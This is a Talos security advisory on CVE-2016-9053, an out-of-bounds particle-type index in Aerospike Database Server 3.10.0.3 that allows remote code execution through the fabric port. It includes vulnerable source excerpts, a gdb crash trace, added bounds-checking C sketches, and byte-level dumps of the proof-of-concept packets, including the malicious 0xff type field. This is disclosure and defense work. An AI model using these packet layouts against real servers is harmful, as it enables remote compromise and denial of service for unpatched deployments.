Talos Vulnerability Report

TALOS-2016-0267

Aerospike Database Server RW Fabric Message Particle Type Code Execution Vulnerability

February 21, 2017
CVE Number

CVE-2016-9053

Summary

An exploitable out-of-bounds indexing vulnerability exists in the handling of the particle type within RW fabric messages in Aerospike Database Server 3.10.0.3. A specially crafted packet can cause the server to fetch a function table from outside the bounds of an array, resulting in remote code execution. An attacker can simply connect to the server's fabric port and send such a packet to trigger this vulnerability.

Tested Versions

Aerospike Database Server 3.10.0.3

Product URLs

https://github.com/aerospike/aerospike-server/tree/3.10.0.3

CVSSv3 Score

9.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CWE

CWE-129 - Improper Validation of Array Index

Details

Aerospike Database Server is a distributed and scalable NoSQL database that is used as a back-end for scalable web applications that need a key-value store. With a focus on performance, it is multi-threaded and keeps its indexes entirely in RAM, with the ability to persist data to a solid-state drive or traditional rotational media.

When processing a packet from the fabric port, the server calls the fabric_buffer_process_readable function. Inside this function, the server reads data from a socket and then hands the data off to the fabric_buffer_process_msg function [1]. Inside fabric_buffer_process_msg, the server parses the message to determine its type and size [2]. The first message must be of the AS_FABRIC(0) type; while fb->fne is still unset, it is handled by fabric_buffer_process_fabric_msg [3], which assigns the fb->fne variable. Once the AS_FABRIC(0) message has been received, an attacker can proceed to send another message type. When this next message arrives, its type is used as an index into a list of callbacks [4], which hands the packet off to the handler registered for that message type.

as/src/fabric/fabric.c:1029
static bool
fabric_buffer_process_readable(fabric_buffer *fb)
{
...
        else if (fabric_buffer_process_msg(fb)) {   // [1]

as/src/fabric/fabric.c:986
static bool
fabric_buffer_process_msg(fabric_buffer *fb)
{
    msg *m = as_fabric_msg_get(fb->r_type);                     // [2]
...
    if (msg_parse(m, fb->r_buf, fb->r_msg_size) != 0) {
...
    }

    if (! fb->fne) {
        bool ret = fabric_buffer_process_fabric_msg(fb, m);     // [3]
        as_fabric_msg_put(m);
        return ret;
    }
...
    if (g_fabric_args->msg_cb[m->type]) {
        (*g_fabric_args->msg_cb[m->type])(fb->fne->node, m, g_fabric_args->msg_udata[m->type]); // [4]
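
Dispatching through a table indexed by a value that arrives over the wire is the same pattern that goes wrong later in this report with particle_vtable. The following is a minimal, hypothetical sketch (not Aerospike's code) of checking such an index before it is used; `cb_table`, `CB_TABLE_SIZE`, `dispatch_checked`, and `example_handler` are invented names, and the table size of 32 is an arbitrary assumption.

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical callback signature, loosely modeled on the msg_cb entries above. */
typedef int (*msg_cb_fn)(uint64_t node, void *msg, void *udata);

/* Hypothetical table size; the real size is not shown in this report. */
#define CB_TABLE_SIZE 32

typedef struct {
    msg_cb_fn cb[CB_TABLE_SIZE];
    void *udata[CB_TABLE_SIZE];
} cb_table;

/* Hypothetical example handler used only to illustrate dispatch. */
int example_handler(uint64_t node, void *msg, void *udata)
{
    (void)node;
    (void)msg;
    (void)udata;
    return 42;
}

/* Returns -1 if the type is out of range or has no handler; otherwise returns
 * the handler's result. The bounds check happens before any array access. */
int dispatch_checked(const cb_table *t, uint32_t type, uint64_t node, void *msg)
{
    if (type >= CB_TABLE_SIZE || t->cb[type] == NULL) {
        return -1;
    }
    return t->cb[type](node, msg, t->udata[type]);
}
```

Comparing the index against the table size, and the slot against NULL, keeps an out-of-range type from ever being used to load a function pointer, at the cost of one comparison per message.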

This particular vulnerability uses the M_TYPE_RW(7) message type. Once such a message is sent to the fabric port, the server calls the rw_msg_cb function. Inside this function, the server extracts the operation type from the RW_FIELD_OP(0) field [1]. This value is then used to select a case in a switch statement. Although the provided proof-of-concept uses the RW_OP_WRITE(1) operation [2], the RW_OP_MULTI(5) operation can also be used to trigger this vulnerability [2].

as/src/transaction/rw_request_hash.c:427
int
rw_msg_cb(cf_node id, msg* m, void* udata)
{
    uint32_t op;

    if (msg_get_uint32(m, RW_FIELD_OP, &op) != 0) {         // [1]
        cf_warning(AS_RW, "got rw msg without op field");
        as_fabric_msg_put(m);
        return 0;
    }
...
    switch (op) {
...
    case RW_OP_WRITE:
        repl_write_handle_op(id, m);                        // [2]
        break;
...
    case RW_OP_MULTI:
        {
...
            repl_write_handle_multiop(id, m);               // [2]
...
    }

To handle the write operation, repl_write_handle_op extracts a buffer from the RW_FIELD_RECORD(9) field [1]. This buffer has a specific format and is handed off to the write_replica function for decoding [2]. The structure also contains an array of bins, each carrying the type index that is key to this vulnerability.

as/src/transaction/replica_write.c:258
void
repl_write_handle_op(cf_node node, msg* m)
{
...
    uint8_t* pickled_buf;
    size_t pickled_sz;
...
    else if (msg_get_buf(m, RW_FIELD_RECORD, (uint8_t**)&pickled_buf,           // [1]
            &pickled_sz, MSG_GET_DIRECT) == 0) {
        // <><><><><><>  Write Pickle  <><><><><><>
...
        result = write_replica(&rsv, keyd, pickled_buf, pickled_sz, &rec_props, // [2]
                generation, void_time, last_update_time, node, info, &linfo);

Inside the write_replica function is the code responsible for parsing the RW_FIELD_RECORD(9) buffer. The buffer begins with a big-endian uint16_t that holds the number of bins [1]. A stack array of bins is then allocated and filled in by as_storage_rd_load_bins [2]. After the bins are loaded, write_replica calls as_record_buf_get_stack_particles_sz to determine the size of a particle buffer, which is then allocated on the stack [3].

as/src/transaction/replica_write.c:981
int
write_replica(as_partition_reservation* rsv, cf_digest* keyd,
        uint8_t* pickled_buf, size_t pickled_sz,
        const as_rec_props* p_rec_props, as_generation generation,
        uint32_t void_time, uint64_t last_update_time, cf_node master,
        uint32_t info, ldt_prole_info* linfo)
{
...
    bool has_sindex = (info & RW_INFO_SINDEX_TOUCHED) != 0 ||
            (is_create && as_sindex_ns_has_sindex(ns));
...
    // TODO - we really need an inline utility for this!
    uint16_t newbins = ntohs(*(uint16_t*)pickled_buf);                          // [1]
...
    as_bin stack_bins[rd.ns->storage_data_in_memory ? 0 : rd.n_bins];

    as_storage_rd_load_bins(&rd, stack_bins); // TODO - handle error returned   // [2]

    uint32_t stack_particles_sz = rd.ns->storage_data_in_memory ?
            0 : as_record_buf_get_stack_particles_sz(pickled_buf);              // [3]
    uint8_t stack_particles[stack_particles_sz + 256];
    uint8_t* p_stack_particles = stack_particles;
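
The TODO above line [1] asks for an inline utility, and that line reads two bytes from pickled_buf without first consulting pickled_sz. A minimal sketch of such a helper follows, assuming the caller has the buffer length available (as pickled_sz is here); `read_be16` is a hypothetical name, not an Aerospike function.

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical helper: reads a big-endian uint16_t at buf[*off] and advances
 * *off. Returns 0 on success, or -1 if fewer than 2 bytes remain. */
int read_be16(const uint8_t *buf, size_t len, size_t *off, uint16_t *out)
{
    if (*off > len || len - *off < 2) {
        return -1;
    }
    *out = (uint16_t)((buf[*off] << 8) | buf[*off + 1]);
    *off += 2;
    return 0;
}
```

Returning an error instead of reading past the buffer lets the caller reject a short RECORD(0x9) field rather than trusting its first two bytes.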

The call to as_record_buf_get_stack_particles_sz re-parses the pickled buffer that was read earlier in order to determine the number of bins. A loop then iterates over each “bin” within the packet, calling the as_particle_size_from_pickled function for each one [1]. This function reads a uint8_t type [2] followed by a 32-bit big-endian value_size [3], which are used to calculate the size of a “particle”. Because the server never checks the uint8_t type against the bounds of the particle_vtable array, an attacker can specify an index that lies outside it [4]. Each element of this array points to a table of function pointers. Once an element is selected by the type index, its size_from_wire_fn function pointer is called with the value and value_size pulled directly from the packet. With an out-of-range type, whatever memory follows the array is treated as a vtable pointer, and the function pointer loaded through it is called.

as/src/base/record.c:335
uint32_t
as_record_buf_get_stack_particles_sz(uint8_t *buf) {
...
    uint16_t newbins = ntohs( *(uint16_t *) buf );
    buf += 2;

    for (uint16_t i = 0; i < newbins; i++) {
...
        stack_particles_sz += as_particle_size_from_pickled(&buf);  // [1]
    }

    return (stack_particles_sz);
}
as/src/base/particle.c:195
int32_t
as_particle_size_from_pickled(uint8_t **p_pickled)
{
    const uint8_t *pickled = (const uint8_t *)*p_pickled;
    uint8_t type = *pickled++;                                          // [2]
    const uint32_t *p32 = (const uint32_t *)pickled;
    uint32_t value_size = cf_swap_from_be32(*p32++);                    // [3]
    const uint8_t *value = (const uint8_t *)p32;

    *p_pickled = (uint8_t *)value + value_size;

    // TODO - safety-check type.
    return particle_vtable[type]->size_from_wire_fn(value, value_size); // [4]
}
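
The TODO at [4] already notes the missing check. Below is a minimal sketch of a bounds-checked variant, not the vendor's fix. It assumes: `PARTICLE_VTABLE_COUNT` equals the 0x18 entries gdb reports for particle_vtable in the crash information below; the vtable struct is reduced to the single member used here; and a `remaining` length parameter is added, since the original function receives no length at all. The function names are hypothetical.

```c
#include <stddef.h>
#include <stdint.h>

/* Entry count gdb reports for particle_vtable (0x18); assumed fixed. */
#define PARTICLE_VTABLE_COUNT 24

/* Reduced stand-in for the real vtable: only the member used here. */
typedef struct {
    int32_t (*size_from_wire_fn)(const uint8_t *value, uint32_t value_size);
} particle_vtable_s;

/* Hypothetical example handler: reports the wire size unchanged. */
int32_t example_size_from_wire(const uint8_t *value, uint32_t value_size)
{
    (void)value;
    return (int32_t)value_size;
}

/* Hypothetical checked variant. Returns -1 (leaving *p_pickled untouched) on a
 * truncated header, an out-of-range type, or a value that overruns the buffer. */
int32_t particle_size_from_pickled_checked(
        const particle_vtable_s *const vtable[PARTICLE_VTABLE_COUNT],
        const uint8_t **p_pickled, size_t remaining)
{
    const uint8_t *p = *p_pickled;

    if (remaining < 5) {                    /* 1-byte type + 4-byte size */
        return -1;
    }
    uint8_t type = p[0];
    uint32_t value_size = ((uint32_t)p[1] << 24) | ((uint32_t)p[2] << 16) |
                          ((uint32_t)p[3] << 8) | (uint32_t)p[4];

    /* The check missing at [4]: reject indexes past the end of the array. */
    if (type >= PARTICLE_VTABLE_COUNT || vtable[type] == NULL ||
            vtable[type]->size_from_wire_fn == NULL) {
        return -1;
    }
    if (value_size > remaining - 5) {
        return -1;
    }
    const uint8_t *value = p + 5;
    *p_pickled = value + value_size;
    return vtable[type]->size_from_wire_fn(value, value_size);
}
```

Validating the type before the array access means a value such as 0xff is rejected instead of being used to load a pointer from beyond the table.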

Crash Information

# gdb -q -p `systemctl status aerospike.service | grep 'Main PID' | cut -d: -f2- | cut -d' ' -f2`
...

(gdb) c
Continuing.
[Switching to Thread 0x7f7174796700 (LWP 53400)]

Catchpoint 4 (signal SIGSEGV), 0x00000000004d9aaa in as_particle_size_from_pickled (p_pickled=0x7f71747951a8) at base/particle.c:207
207             return particle_vtable[type]->size_from_wire_fn(value, value_size);

(gdb) x/6i $pc - 8
   0x4d9aa2 <as_particle_size_from_pickled+114>:        mov    0xa9fd90(,%rdx,8),%rdx
=> 0x4d9aaa <as_particle_size_from_pickled+122>:        mov    0x30(%rdx),%rdx
   0x4d9aae <as_particle_size_from_pickled+126>:        mov    -0x30(%rbp),%rdi
   0x4d9ab2 <as_particle_size_from_pickled+130>:        mov    -0x24(%rbp),%esi
   0x4d9ab5 <as_particle_size_from_pickled+133>:        callq  *%rdx
   0x4d9ab7 <as_particle_size_from_pickled+135>:        add    $0x30,%rsp

(gdb) p type
$1 = 0xff

(gdb) p sizeof(particle_vtable) / sizeof(*particle_vtable)
$4 = 0x18
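
The faulting sequence can be checked by hand. The first mov loads particle_vtable[type] from 0xa9fd90 + type * 8, and the second dereferences that value at offset 0x30 to fetch size_from_wire_fn; the SIGSEGV occurs on that second load, so the value read from the out-of-bounds slot was not a valid pointer in this run. The small sketch below reproduces the arithmetic, assuming the displacement 0xa9fd90 is the address of particle_vtable and that each entry is an 8-byte pointer (the scale factor in the instruction). The function names are hypothetical.

```c
#include <stdint.h>

/* Assumptions: 0xa9fd90 is the address of particle_vtable (the displacement
 * in the faulting mov) and each entry is an 8-byte pointer (the *8 scale). */
#define VTABLE_BASE  0xa9fd90u
#define VTABLE_COUNT 0x18u
#define SLOT_SIZE    8u

/* Address read by the mov at 0x4d9aa2 for a given type index. */
uint64_t vtable_slot_addr(uint32_t type)
{
    return (uint64_t)VTABLE_BASE + (uint64_t)type * SLOT_SIZE;
}

/* Offset of that slot relative to one-past-the-end of the 24-entry array;
 * a negative result means the index is in bounds. */
int64_t slot_offset_from_end(uint32_t type)
{
    return ((int64_t)type - (int64_t)VTABLE_COUNT) * (int64_t)SLOT_SIZE;
}
```

With type = 0xff, the slot read is 0xaa0588, which is 0x738 (1848) bytes beyond the end of the array.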

Exploit Proof-of-Concept

To execute the proof-of-concept (note: this was provided only to the vendor), extract it and run it as follows:

$ python poc hostname:3001 $namespace
Trying to connect to hostname:3001
Sending 0x15 byte packet... done.
Sending 0x78 byte packet... done.

Each fabric packet for Aerospike server has the following structure. It begins with a 32-bit size, followed by a 16-bit message type. The size gives the length in bytes of the fields that follow this 6-byte header (for example, a size of 0x0f plus the header gives the 0x15-byte first packet sent by the proof-of-concept), and so determines how many fields are parsed. Each field is prefixed with a 16-bit field id, followed by an 8-bit storage type. After the storage type is a 32-bit size and then the data that represents the contents of the field. To reach a message handler, at least two messages must be sent. The first must be of the AS_FABRIC(0x0) type and include the node identifier in a field with the id FIELD_NODE(0x0). The FIELD_NODE(0x0) field uses UINT64(0x4) as its type, and its value can simply be an arbitrary number.

<class aspie.msg_fabric>
[0] <instance uint32_t 'size'> +0x0000000f (15)
[4] <instance aspie.M_TYPE 'type'> FABRIC(0x0)
[6] <instance array(aspie.msg_fabric_field,1) 'fields'> aspie.msg_fabric_field[1] "\x00\x00\x04\x00\x00\x00\x08\xe9\x07\x4e\xd5\x31\xa5\x0d\xe2"

<class aspie.msg_fabric_field> '0'
[6] <instance aspie.fabric_field_id 'id'> FIELD_NODE(0x0)
[8] <instance aspie.M_FT 'type'> UINT64(0x4)
[9] <instance uint32_t 'size'> +0x00000008 (8)
[d] <instance uint64_t 'content'> +0xe9074ed531a50de2 (16791476413242084834)
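
A minimal parser for the layout described above is sketched below. It follows this report's description and field dumps (a big-endian 32-bit size covering only the fields, a 16-bit message type, then fields made of a 16-bit id, an 8-bit storage type, a 32-bit size, and the content); big-endian byte order is an assumption inferred from the dumps. It is not Aerospike's msg_parse, and `fabric_field`, `fabric_parse`, and `MAX_FIELDS` are hypothetical names. Every length is checked against the bytes actually available before it is used.

```c
#include <stddef.h>
#include <stdint.h>

#define MAX_FIELDS 32   /* hypothetical cap on fields per message */

typedef struct {
    uint16_t id;
    uint8_t type;              /* storage type, e.g. UINT32(0x2), UINT64(0x4), BUF(0x6) */
    uint32_t size;
    const uint8_t *content;    /* points into the caller's buffer */
} fabric_field;

static uint32_t be32(const uint8_t *p)
{
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
           ((uint32_t)p[2] << 8) | (uint32_t)p[3];
}

/* Parses one message into fields[0..MAX_FIELDS). Returns the number of fields,
 * or -1 if any size runs past the buffer or there are too many fields. */
int fabric_parse(const uint8_t *buf, size_t len, uint16_t *msg_type,
                 fabric_field *fields)
{
    if (len < 6) {
        return -1;
    }
    uint32_t body = be32(buf);                  /* bytes of fields after the header */
    *msg_type = (uint16_t)((buf[4] << 8) | buf[5]);
    if (body > len - 6) {
        return -1;
    }
    const uint8_t *p = buf + 6;
    const uint8_t *end = p + body;
    int n = 0;
    while (p < end) {
        if (n == MAX_FIELDS || (size_t)(end - p) < 7) {
            return -1;                          /* too many fields or short field header */
        }
        fabric_field *f = &fields[n++];
        f->id = (uint16_t)((p[0] << 8) | p[1]);
        f->type = p[2];
        f->size = be32(p + 3);
        p += 7;
        if (f->size > (size_t)(end - p)) {
            return -1;                          /* content overruns the message body */
        }
        f->content = p;
        p += f->size;
    }
    return n;
}
```

Applied to the first 0x15-byte packet shown above (assuming its header bytes are 00 00 00 0f 00 00), this yields message type 0 and a single field with id FIELD_NODE(0x0), storage type UINT64(0x4), and size 8. A hardened receiver would also check that each field's storage type and size match what its handler expects before decoding the content.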

Once the AS_FABRIC(0x0) message has been sent, the proof-of-concept will follow with a message of type AS_RW(0x7). This second message sent by the proof-of-concept has the following format.

<class aspie.msg_fabric>
[0] <instance uint32_t 'size'> +0x00000072 (114)
[4] <instance aspie.M_TYPE 'type'> RW(0x7)
[6] <instance array(aspie.msg_fabric_field,7) 'fields'> aspie.msg_fabric_field[7] "\x00\x00\x02\x00\x00\x00\x04  ..skipped ~94 bytes.. \x00\x00\x04\x1d\x0c\xda\x12"

An AS_RW(0x7) packet contains a number of fields that describe the request. One of these is OP(0x0), which specifies the kind of operation to perform. The proof-of-concept uses the WRITE(0x1) operation, so the OP(0x0) field must be defined as a UINT32(0x2) with a value of WRITE(0x1). To reach the vulnerable code described in this advisory, a number of other fields must also be defined. Each of these fields is described individually.

<class aspie.msg_fabric_field> '0'
[6] <instance aspie.rw_field_id 'id'> OP(0x0)
[8] <instance aspie.M_FT 'type'> UINT32(0x2)
[9] <instance uint32_t 'size'> +0x00000004 (4)
[d] <instance aspie.RW_OP_ 'content'> WRITE(0x1)

Most fabric packet types include a string naming the NAMESPACE(0x2) that the request refers to. At offset 0x11 of the second packet sent by the proof-of-concept is a string containing the namespace chosen by the user. This must be a BUF(0x6) type and can contain arbitrary content.

<class aspie.msg_fabric_field> '1'
[11] <instance aspie.rw_field_id 'id'> NAMESPACE(0x2)
[13] <instance aspie.M_FT 'type'> BUF(0x6)
[14] <instance uint32_t 'size'> +0xXXXXXXXX (X)
[18] <instance block 'content'> ...

The next field sent by the proof-of-concept is another buffer, representing the DIGEST(0x5). This must also be a BUF(0x6) type and can contain arbitrary content.

<class aspie.msg_fabric_field> '2'
[1b] <instance aspie.rw_field_id 'id'> DIGEST(0x5)
[1d] <instance aspie.M_FT 'type'> BUF(0x6)
[1e] <instance uint32_t 'size'> +0x00000008 (8)
[22] <instance block 'content'> "\x3f\x81\x3c\xaf\xaa\x3d\x12\x63"

The next field is INFO(0xc). This field holds a set of RW_INFO_ flags and is not required to trigger this vulnerability; the proof-of-concept simply sets it to 0x00000000, although it can hold any value. The two required fields at the end of the packet are GENERATION(0x4) and VOID_TIME(0xb). Both are UINT32(0x2) fields, and their values are not significant, except that the contents of GENERATION(0x4) must not be 0.

<class aspie.msg_fabric_field> '3'
[2a] <instance aspie.rw_field_id 'id'> INFO(0xc)
[2c] <instance aspie.M_FT 'type'> +0x00 (0)
[2d] <instance uint32_t 'size'> +0x00000000 (0)
[31] <instance aspie.RW_INFO_ 'content'> +0x0 (0)

<class aspie.msg_fabric_field> '5'
[62] <instance aspie.rw_field_id 'id'> GENERATION(0x4)
[64] <instance aspie.M_FT 'type'> UINT32(0x2)
[65] <instance uint32_t 'size'> +0x00000004 (4)
[69] <instance uint32_t 'content'> +0xc669712b (3328799019)

<class aspie.msg_fabric_field> '6'
[6d] <instance aspie.rw_field_id 'id'> VOID_TIME(0xb)
[6f] <instance aspie.M_FT 'type'> UINT32(0x2)
[70] <instance uint32_t 'size'> +0x00000004 (4)
[74] <instance uint32_t 'content'> +0x1d0cda12 (487381522)

The fifth field of the AS_RW(0x7) message (index 4 in the dump) has the identifier RECORD(0x9) and the storage type BUF(0x6). This field contains an embedded structure that is key to triggering this vulnerability.

<class aspie.msg_fabric_field> '4'
[31] <instance aspie.rw_field_id 'id'> RECORD(0x9)
[33] <instance aspie.M_FT 'type'> BUF(0x6)
[34] <instance uint32_t 'size'> +0x0000002a (42)
[38] <instance ptype.block 'content'> "\x00\x01\x11\x00\x42\x73\xcf\xb8\x94\x0b\x2a\xf2\x34\x2e\x28\x58\xae\x6a\x76\x56\x00\xff\x00\x00\x00\x10\x55\x2c\x49\x40\x69\xe7\xef\x23\x77\x6c\x39\x2b\xff\x39\x41\xdc"

At the beginning of the RECORD(0x9) field's content is a uint16_t giving the number of elements that follow. The provided proof-of-concept simply sets this to 0x0001, as only one element is required to trigger this vulnerability.

<class pickled_record>
[38] <instance uint16_t 'newbins'> +0x0001 (1)
[3a] <instance array(bin,1) 'bin'> bin[1] "\x11\x00\x42\x73\xcf\xb8\x94\x0b\x2a\xf2\x34\x2e\x28\x58\xae\x6a\x76\x56\x00\xff\x00\x00\x00\x10\x55\x2c\x49\x40\x69\xe7\xef\x23\x77\x6c\x39\x2b\xff\x39\x41\xdc"

Each element has the following structure, which is parsed to extract the index that the server misuses. The name_sz field gives the length of the name string within the structure. If the type field of any element is 24 (0x18) or greater, the type indexes past the end of the server's particle_vtable array of function tables, which holds 0x18 entries according to the gdb session above.

<class bin> '0'
[3a] <instance uint8_t 'name_sz'> +0x11 (17)
[3b] <instance uint8_t 'version'> +0x00 (0)
[3c] <instance szstring<char_t> 'name'> "\x42\x73\xcf\xb8\x94\x0b\x2a\xf2\x34\x2e\x28\x58\xae\x6a\x76\x56\x00"
[4d] <instance uint8_t 'type'> +0xff (255)
[4e] <instance uint32_t 'value_size'> +0x00000010 (16)
[52] <instance block(16) 'value'> "\x55\x2c\x49\x40\x69\xe7\xef\x23\x77\x6c\x39\x2b\xff\x39\x41\xdc"
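
Putting the pickled layout together, the sketch below walks a RECORD(0x9) buffer in the same order as as_record_buf_get_stack_particles_sz, but validates each bin before trusting it: the name must fit in the buffer, the type must be in bounds for a 24-entry particle_vtable, and value_size must not run past the end. The bin layout (name_sz, version, name, type, value_size, value) is taken from the proof-of-concept's dump above, and value_size is read big-endian as cf_swap_from_be32 does in as_particle_size_from_pickled. The function `validate_pickled_bins` and the constant `PARTICLE_TYPE_COUNT` are hypothetical.

```c
#include <stddef.h>
#include <stdint.h>

#define PARTICLE_TYPE_COUNT 24   /* particle_vtable entries per gdb (0x18) */

/* Returns 0 if every bin is well formed, or -1 otherwise. On failure *bad_bin
 * holds the index of the offending bin, or 0xffff if the count is missing. */
int validate_pickled_bins(const uint8_t *buf, size_t len, uint16_t *bad_bin)
{
    if (len < 2) {
        *bad_bin = 0xffff;
        return -1;
    }
    uint16_t newbins = (uint16_t)((buf[0] << 8) | buf[1]);   /* like ntohs() */
    size_t off = 2;

    for (uint16_t i = 0; i < newbins; i++) {
        *bad_bin = i;
        if (len - off < 2) {                        /* name_sz + version */
            return -1;
        }
        size_t name_sz = buf[off];
        off += 2;
        if (len - off < name_sz + 5) {              /* name + type + value_size */
            return -1;
        }
        off += name_sz;
        uint8_t type = buf[off];
        uint32_t value_size = ((uint32_t)buf[off + 1] << 24) |
                              ((uint32_t)buf[off + 2] << 16) |
                              ((uint32_t)buf[off + 3] << 8) |
                              (uint32_t)buf[off + 4];
        off += 5;
        if (type >= PARTICLE_TYPE_COUNT) {          /* out of bounds for particle_vtable */
            return -1;
        }
        if (value_size > len - off) {               /* value overruns the buffer */
            return -1;
        }
        off += value_size;
    }
    return 0;
}
```

Run against the proof-of-concept's 42-byte RECORD(0x9) content, this check rejects bin 0 because its type is 0xff. Performing the validation once, before any size calculation, would keep an out-of-range type from ever reaching a particle_vtable lookup.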

Mitigation

It is recommended to use technology such as a firewall to deny untrusted hosts access to the ports the server uses for clustering, including the fabric port.

Timeline

2016-12-23 - Vendor Disclosure
2017-02-21 - Public Release

Credit

Discovered by the Cisco Talos Team